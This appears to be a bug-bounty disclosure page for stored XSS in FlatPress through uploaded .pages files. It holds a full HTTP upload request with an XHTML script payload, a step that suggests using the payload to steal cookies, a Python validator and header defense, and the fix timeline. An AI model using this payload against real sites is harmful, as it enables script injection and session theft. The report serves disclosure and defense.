Stored XSS via `.pages` File in flatpressblog/flatpress

Valid

Reported on

Jan 2nd 2023


Description

When a user uploads a file with a .pages extension through the admin uploader and then opens it directly, the server returns it with Content-Type: application/octet-stream, and the browser ends up processing the .pages file as HTML, so the XHTML script element in the file executes. I only discovered this file extension while doing more research on XSS.

Proof of Concept

POST /flatpress-master/admin.php?p=uploader&action=default HTTP/1.1
Host: localhost
Content-Length: 2051
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGDdtfAjfJHeGw497
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/flatpress-master/admin.php?p=uploader
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; fpuser_fp-9a36daaa=admin; fppass_fp-9a36daaa=%242y%2410%24k7Y2.YM02Q4HFMKnFhhtTea2.GpaY4XW8JL0U05O%2FTIkIvWg%2FfYyy; fpuser_fp-9b7fc0a2=admin; fppass_fp-9b7fc0a2=%242y%2410%24cxsAXo1XdfPxtztQL8Ehuei7Un1fUCqJG%2Fm7IeIyLG1PIdGXEvxwi; security_level=0; fpsess_fp-9a36daaa=cchci3ludjhp8frr6dleds54b8; fpsess_fp-9b7fc0a2=a0b4ht1pq923t7ao89lgo4fcgb
Connection: close

------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="_wpnonce"

96b07d2bb9
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="_wp_http_referer"

/flatpress-master/admin.php?p=uploader
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="upload[]"; filename="xss.pages"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
    </body>
</html>
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="upload"

Upload
------WebKitFormBoundaryGDdtfAjfJHeGw497--

Steps to take

Log in and then access /admin.php?p=uploader&action=default. Upload the .pages file, using malicious JavaScript to steal user cookies.
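The two defences that close this class of bug are an extension allowlist plus a content check at upload time, and download-only headers when a stored upload is served. The following is an added example written for this page, not FlatPress code and not the fix in commit f6394e; the allowed-extension set is an assumption, and the sample payload is constructed from the PoC above.

```python
"""Upload validation and download headers that would block the .pages PoC.

Added example for this report; not FlatPress's own code.
"""
import os
import re
from typing import Dict, Tuple

# Assumed allowlist for the example. The real FlatPress list is not reproduced.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "zip"}

# Markers that let a browser treat the body as (X)HTML regardless of extension:
# an XML prolog, a namespaced or plain <html>/<script>/<svg>/... tag, or an
# XHTML namespace declaration. Checked case-insensitively on the first 4 KiB.
_HTML_MARKERS = re.compile(
    rb"<\s*(?:\w+:)?(?:html|script|svg|body|iframe|object|embed)\b"
    rb"|<\?xml\b"
    rb"|xmlns(?::\w+)?\s*=\s*['\"]http://www\.w3\.org/1999/xhtml['\"]",
    re.IGNORECASE,
)


def extension_of(filename: str) -> str:
    """Lower-cased final extension of the basename, '' if there is none."""
    base = os.path.basename(filename.replace("\\", "/"))
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def looks_like_markup(content: bytes) -> bool:
    """True if the start of the body contains HTML/XML that a browser could render."""
    return _HTML_MARKERS.search(content[:4096]) is not None


def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Reject unknown extensions first, then reject bodies that carry markup
    even when the extension itself is harmless (e.g. .txt)."""
    ext = extension_of(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '.{ext}' is not allowed"
    if looks_like_markup(content):
        return False, "content contains HTML/XML markup"
    return True, "ok"


def download_headers(filename: str) -> Dict[str, str]:
    """Headers for serving a stored upload so the browser never renders it inline.

    nosniff stops MIME sniffing, attachment forces a download, and the CSP
    sandbox neuters script if something is still rendered."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", os.path.basename(filename))
    return {
        "Content-Type": "application/octet-stream",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "Content-Security-Policy": "sandbox",
    }


# Constructed from the PoC body in this report.
POC_PAGES = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n<html>\n    <head></head>\n    <body>\n'
    b'        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>\n'
    b"    </body>\n</html>\n"
)

if __name__ == "__main__":
    print(validate_upload("xss.pages", POC_PAGES))
    print(validate_upload("xss.txt", POC_PAGES))
    print(validate_upload("notes.txt", b"plain notes"))
    print(download_headers("xss.pages"))
```

The content check matters independently of the allowlist: renaming the same payload to an allowed extension such as .txt still gets caught, and the serving headers protect files that were already on disk before the upload filter existed.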

Empirical evidence

https://drive.google.com/file/d/1PG8Tiz63Sw6rBeRDPDYrBo4PQjGyikL5/view?usp=sharing

Impact

This vulnerability allows arbitrary JavaScript to execute in the victim's browser: stealing the user's cookies, performing HTTP requests, reading the content of same-origin pages, etc.

We are processing your report and will contact the flatpressblog/flatpress team within 24 hours. 4 months ago
We have contacted a member of the flatpressblog/flatpress team and are waiting to hear back 4 months ago
flatpressblog/flatpress maintainer validated this vulnerability 4 months ago
Juy Lang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
flatpressblog/flatpress maintainer marked this as fixed in 1.3 with commit f6394e 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Mar 1st 2023
flatpressblog/flatpress maintainer published this vulnerability 2 months ago